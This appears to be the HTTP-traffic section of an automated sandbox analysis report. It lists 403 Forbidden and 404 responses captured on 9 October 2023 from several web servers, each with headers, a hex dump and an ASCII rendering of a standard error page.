                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:51:03 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: NR2dEkSg/DhDfspVdData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 75e75d286f9401b9c221bc2ef8e3911609500441Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Date: Mon, 09 Oct 2023 13:51:04 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 37 37 22 2c 20 31 36 39 36 38 35 39 34 31 37 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 33 3a 30 34 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4777", 1696859417, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:04 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:51:04 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: yFpwRxxD/IrWurBlBData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 7ac4c4e1-bff0-43a8-be33-a9ab18261eaeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vKKL8rtO%2F78xY24bzCY60fpUCq0WMiv%2FJRabTjWa%2BhJ2OZcDdgfixTPdA2%2FpTydpFPoLIQPpoUBJBQdqVy%2BSP5a8QgJj0GJYB%2BL7Cir4v%2FMqKRBLAK2n0sejI52FSni6mA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=91.000080Server: cloudflareCF-RAY: 813718a79dfc7d6b-LAXalt-svc: h3=":443"; ma=86400
